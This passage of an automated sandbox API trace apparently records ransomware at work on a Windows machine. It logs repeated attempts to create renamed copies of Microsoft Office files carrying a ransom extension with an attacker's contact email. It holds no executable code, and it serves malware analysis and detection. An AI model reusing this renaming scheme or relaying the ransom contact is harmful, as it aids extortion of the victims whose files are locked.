office\\root\\office16\\1033\\pubspapr\\pdir37f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.575] CloseHandle (hObject=0x544) returned 1 [0176.577] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.577] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR38F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir38f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.577] CloseHandle (hObject=0x544) returned 1 [0176.578] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.578] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR39F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir39f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.578] CloseHandle (hObject=0x544) returned 1 [0176.579] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.579] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.579] CloseHandle (hObject=0x544) returned 1 [0176.579] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.580] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.580] CloseHandle (hObject=0x544) returned 1 [0176.581] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.581] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR40F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir40f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.581] CloseHandle (hObject=0x544) returned 1 [0176.582] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.582] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR41F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir41f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.582] CloseHandle (hObject=0x544) returned 1 [0176.583] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.583] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR42F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir42f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.583] CloseHandle (hObject=0x544) returned 1 [0176.584] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.584] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.584] CloseHandle (hObject=0x544) returned 1 [0176.585] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.585] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.586] CloseHandle (hObject=0x544) returned 1 [0176.587] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.587] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.587] CloseHandle (hObject=0x544) returned 1 [0176.588] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.588] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.589] CloseHandle (hObject=0x544) returned 1 [0176.589] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.589] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.590] CloseHandle (hObject=0x544) returned 1 [0176.590] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.590] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.591] CloseHandle (hObject=0x544) returned 1 [0176.591] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.591] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.592] CloseHandle (hObject=0x544) returned 1 [0176.593] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.593] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.593] CloseHandle (hObject=0x544) returned 1 [0176.594] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.594] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.594] CloseHandle (hObject=0x544) returned 1 [0176.595] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.595] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.595] CloseHandle (hObject=0x544) returned 1 [0176.596] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.597] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.597] CloseHandle (hObject=0x544) returned 1 [0176.597] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.597] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.598] CloseHandle (hObject=0x544) returned 1 [0176.598] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.598] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.599] CloseHandle (hObject=0x544) returned 1 [0176.599] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.599] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.600] CloseHandle (hObject=0x544) returned 1 [0177.045] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.045] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.232] CloseHandle (hObject=0x54c) returned 1 [0177.680] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.680] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TERRCOTT.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\terrcott.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.681] CloseHandle (hObject=0x534) returned 1 [0177.682] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.682] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Sybase.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sybase.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.682] CloseHandle (hObject=0x534) returned 1 [0177.683] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.683] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\trdtv2r41.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\trdtv2r41.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.684] CloseHandle (hObject=0x534) returned 1 [0177.686] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.686] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.687] CloseHandle (hObject=0x534) returned 1 [0177.688] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.688] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.689] CloseHandle (hObject=0x534) returned 1 [0177.692] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.692] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.692] CloseHandle (hObject=0x534) returned 1 [0177.696] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.696] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\el\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\el\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.697] CloseHandle (hObject=0x534) returned 1 [0177.697] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.697] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.698] CloseHandle (hObject=0x534) returned 1 [0177.701] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.701] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\es\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\es\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.701] CloseHandle (hObject=0x534) returned 1 [0177.704] SetFilePointerEx (in: 